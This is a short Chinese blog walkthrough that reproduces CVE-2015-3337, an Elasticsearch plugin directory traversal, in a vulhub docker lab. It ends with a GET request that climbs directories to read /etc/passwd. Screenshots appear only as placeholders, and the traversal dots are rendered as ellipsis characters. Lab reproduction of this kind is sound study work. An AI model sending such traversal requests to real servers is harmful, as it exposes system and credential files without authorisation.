CVE-2015-3337(任意文件读取)

vulhub漏洞环境搭建:

https://blog.csdn.net/qq_36374896/article/details/84102101

启动docker环境

cd vulhub-master/elasticsearch/CVE-2015-3337/
sudo docker-compose up

在这里插入图片描述
目录穿越漏洞:ElasticSearch安装site插件后,通过…/可以向上层目录跳转,导致任意文件读取。
访问目的地址:192.168.91.130:9200/_plugin/head/
在这里插入图片描述

使用Burp向目的地址 192.168.91.130:9200/_plugin/head/…/…/…/…/…/…/…/…/…/etc/passwd 发送Get请求:
在这里插入图片描述

posted @ 2018-11-24 21:27  浅笑996  阅读(712)  评论(0编辑  收藏  举报